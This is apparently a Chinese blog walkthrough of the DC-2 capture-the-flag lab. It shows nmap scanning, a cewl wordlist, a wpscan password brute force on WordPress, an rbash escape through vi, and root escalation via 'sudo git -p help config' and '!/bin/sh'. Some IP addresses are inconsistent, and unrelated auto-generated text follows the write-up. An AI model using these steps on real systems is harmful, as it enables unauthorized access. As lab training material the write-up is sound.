DC-2(VI GIT提权)


kali攻击🐓:192.168.78.131
目标主机:192.168.78.xxx

环境配置参照DC-1

扫描网段内存活主机及其开放端口

使用命令查询主机所在网段

ifconfig

在这里插入图片描述
得到网段192.168.78.xxx,扫描该网段内其他存活的主机

nmap -sP 192.168.78.0/24 

在这里插入图片描述

发现192.168.78.134的存活主机,接下里扫描该主机的存货端口

nmap -p 1-65535 -A -sV 192.168.78.133

在这里插入图片描述
发现开放80端口
这一阶段任务就结束了,很常规的扫描与发现

FLAG1:访问即可

这里首先需要配置host文件,否则无法访问182.168.78.134的80服务
在这里插入图片描述

配置完毕,访问80端口
在这里插入图片描述

进去就看见第一个flag1,直接访问拿下提示。
在这里插入图片描述
译文:

你通常的词表可能不起作用,所以,也许你只需要成为cewl。

密码越多越好,但有时你不可能赢得所有密码。

作为一个登录以查看下一个标志。

如果找不到,请以其他用户身份登录。

FLAG2:使用工具爆破用户密码

翻看了一下该网站,发现并没有登录框,扫一下看看,这里使用dirsearch

python3 dirsearch.py -u url -e php

在这里插入图片描述
扫描发现wp-login.php,访问一下:
在这里插入图片描述一个纯粹得登录框,根据FLAG1的提示,我们需要使用cewl,并且将密码保存在1.txt中
Cewl:Cewl是一个通过指定url及深度,使用爬虫技术,生成字典的一个工具。Cewl是通过ruby编写,通过爬取网站并提取独立的单词保存为字典,可以和John the Ripper等工具配合使用。

cewl dc-2 > 1.txt

在这里插入图片描述使用cewl得到密码,再使用wpscan扫描。这里说一下为什么要使用wpscan扫描
什么是Wpscan?什么是Wordpres?
1.Wpscan

WPScan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。

2.Wordpress

WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。WordPress有许多第三方开发的免费模板,安装方式简单易用。

在页面的最下方发现了是wordPress

在这里插入图片描述
使用wpSCAN,并手动将用户名保存在2.txt中

wpscan --url dc-2 默认扫描
wpscan --url dc-2 -eu  扫描用户名 (只用这一个)

在这里插入图片描述
使用wpscan撞库,为什么密码使用的是cewl搜集出来的,因为作者的意图在FLAG1中就提示了使用cewl作为密码

wpscan --url http://dc-2 -U 2.txt -P 1.txt 

拿到账号与密码:
在这里插入图片描述
登录jerry(使用TOM登录的话,会发现拿不到FLAG):
在这里插入图片描述
译文:

如果你不能利用WordPress走捷径,还有另一种方法。

希望你能找到另一个切入点。

FLAG3:SSH登录并绕过rbash限制

这里作者说了他的意思,不让我们使用EXP直接连shell,我们需要有其他方法连接shell
使用SSH登录,因为我们拿到了账号的用户与密码了

ssh tom@192.168.182.140 -p 7744

在这里插入图片描述
登录成功,查找并打开flag3.txt

在这里插入图片描述

发现不能打开,rbash。一个受限的shell,该限制很好地实现了命令以及脚本在受限shell中运行。 它为Linux中的bash shell提供了一个额外的安全层。
思路:虽然首先但是依然有可以执行的命令:

compgen -c

只用上述命令即可打印出可以使用的命令

在这里插入图片描述
两者都可以查看文件内容
这里使用less

less flag3.txt

在这里插入图片描述译文:

提示需要su切换用户

FLAG4:VI提权

在这里插入图片描述
很显然依然受到rbash的限制,提个权接触一下限制

vi 123
然后在末行模式下使用:

:set shell=/bin/bash
:shell

最后退出VI模式,在shell中使用

 export  PATH=$PATH:/bin/

即可完成提权

在这里插入图片描述

接下切换用户
在这里插入图片描述
依然是权限不够
得提权

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述
发现没有可以操作的地方
呃发现不是权限的问题,是我在这home下操作,没有admin权限。退到上一级即可

在这里插入图片描述

FLAG5:GIT提权

接下来提示GIT提权

sudo git -p help config 
!/bin/sh

即可提权成功
最后在ROOT目录下拿到FLAG
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
引用# ll /tmp/ 总用量 0 drwxr-xr-x. 5 root root 102 4月 24 10:33 backup drwx------. 3 root root 17 4月 9 11:01 systemd-private-ce58ab41ce4f45acb1dc61af92aebf46-chronyd.service-4na0Qq [root@oldboy tmp# rm -rf /tmp/backup/ [root@oldboy tmp# ll 总用量 0 drwx------. 3 root root 17 4月 9 11:01 systemd-private-ce58ab41ce4f45acb1dc61af92aebf46-chronyd.service-4na0Qq 引用# ll /tmp/ 总用量 0 drwx------. 3 root root 17 4月 9 11:01 systemd-private-ce58ab41ce4f45acb1dc61af92aebf46-chronyd.service-4na0Qq [root@oldboy ~# cat /etc/services > /tmp/oldboy.txt [root@oldboy ~# ll /tmp/ 总用量 656 -rw-r--r--. 1 root root 670293 4月 19 17:19 oldboy.txt drwx------. 3 root root 17 4月 9 11:01 systemd-private-ce58ab41ce4f45acb1dc61af92aebf46-chronyd.service-4na0Qq 因此,对于命令"git clean -adx .",它的作用是从当前目录开始递归地删除未跟踪的文件和目录,包括子模块中的文件和目录。这个命令可以帮助你清理工作目录,删除一些不需要的文件和目录,以保持代码库的整洁。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Linux系统基础操作管理](https://blog.csdn.net/kevinchia/article/details/125144827)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值